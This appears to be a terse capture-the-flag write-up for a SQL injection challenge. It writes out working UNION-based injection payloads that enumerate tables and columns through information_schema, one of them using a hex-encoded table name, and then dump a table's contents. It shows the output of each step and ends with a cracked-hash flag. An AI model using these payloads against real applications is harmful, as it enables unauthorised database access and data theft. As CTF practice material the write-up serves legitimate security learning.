:: INJECTION SQL MEMBERS
=>  GET TABLE NAME
1 and 1=0 union select null,table_name from information_schema.tables limit 0,50-- -
===>
db_default,users,guestbook,list_images,vote_dbs

(1)and(1)=(0)union(select(null),group_concat(column_name)from(information_schema.columns)where(table_name)=(0x6c6973745f696d61676573))#
===>
id,url,title,comment

1 and 1=0 union select title,comment from list_images limit 0,5-- -
THEN DECRYPT MD5 THEN HASHIT TO SHA256
IMAGE FLAG : f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188